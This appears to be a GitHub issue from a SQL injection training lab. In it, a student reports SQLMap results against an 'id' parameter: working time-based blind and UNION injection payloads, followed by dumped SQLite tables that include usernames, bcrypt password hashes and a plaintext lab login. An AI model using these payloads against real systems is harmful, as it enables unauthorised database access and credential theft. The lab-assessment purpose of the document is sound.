diegojoel301 / Evaluacion_Modulo_SQLi_DSWP

Lab for the SQLi Module evaluation

SQLMap - Two Payloads #3

Open cbreckenridge23 opened 2 months ago

cbreckenridge23 commented 2 months ago

By running SQLMap, two payloads were identified and used to dump the databases. This was achieved with the cookie of user3:password123.

The result of the query is attached:

Parameter: id (GET)
Type: time-based blind
Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query)
Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-2794 UNION ALL SELECT 6918,CHAR(113,107,112,118,113)||CHAR(66,87,86,65,74,87,104,108,82,102,83,114,77,70,75,104,68,77,82,119,120,79,104,71,77,122,67,88,110,119,84,98,75,101,86,109,107,107,120,119)||CHAR(113,120,106,113,113),6918-- uznw

It should be noted that these payloads made it possible to identify that the server has the following databases:

Tables: Farmacos, session_cookies, sqlite_sequence and usuarios

cbreckenridge23 commented 2 months ago

sqlmap identified the following injection point(s) with a total of 8043 HTTP(s) requests:

Parameter: id (GET)
Type: time-based blind
Title: SQLite > 2.0 time-based blind - Parameter replace (heavy query)
Payload: id=(SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))

Type: UNION query
Title: Generic UNION query (random number) - 3 columns
Payload: id=-7479 UNION ALL SELECT 8369,8369,CHAR(113,118,112,120,113)||CHAR(121,73,115,89,120,116,75,80,105,80,103,122,111,69,88,107,122,86,74,109,109,82,85,116,74,114,102,113,73,73,104,111,83,70,102,77,122,72,90,103)||CHAR(113,112,118,106,113)-- HJUw

back-end DBMS: SQLite
Database:
Table: session_cookies
[4 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| created_at     | DATETIME |
| id             | INTEGER  |
| session_cookie | TEXT     |
| user_id        | INTEGER  |
+----------------+----------+

back-end DBMS: SQLite
Database:
Table: sqlite_sequence
[2 entries]
+-----+----------+
| seq | name     |
+-----+----------+
| 4   | usuarios |
| 2   | farmacos |
+-----+----------+

Database:
Table: farmacos
[2 entries]
+----+-------------+--------------+
| id | nombre      | descripcion  |
+----+-------------+--------------+
| 1  | Aspirina    | Analgésico   |
| 2  | Paracetamol | Antipirético |
+----+-------------+--------------+

Database:
Table: session_cookies
[0 entries]
+----+---------+------------+----------------+
| id | user_id | created_at | session_cookie |
+----+---------+------------+----------------+
+----+---------+------------+----------------+

Database:
Table: usuarios
[4 entries]
+----+----------+--------------------------------------------------------------+----------+
| id | is_admin | password                                                     | username |
+----+----------+--------------------------------------------------------------+----------+
| 1  | 1        | $2b$12$m4hPcCsuBGCPK6y/aR5xmuE0Xe.C4qgVGDSWomhl3kaPSOCbKqZX. | admin    |
| 2  | 0        | $2b$12$07jsdrqWJ8hro76Q2aiU0u76gR9YIQouHBPMAz2eOADbQz3pd1bLK | user1    |
| 3  | 0        | $2b$12$ptgidjz1BIYtdr8sovgu7OsLRCGNrjnWkvVKLLAnCQ7uonqKcKrYe | user2    |
| 4  | 1        | $2b$12$zutMHDeb5RO3ELon61g2AuH41MvyUoRm9RjU5xrI6drPQTSapS/hG | user3    |
+----+----------+--------------------------------------------------------------+----------+

back-end DBMS: SQLite
banner: '3.40.1'
current user is DBA: True

cbreckenridge23 commented 2 months ago

farmacos.csv session_cookies.csv sqlite_sequence.csv usuarios.csv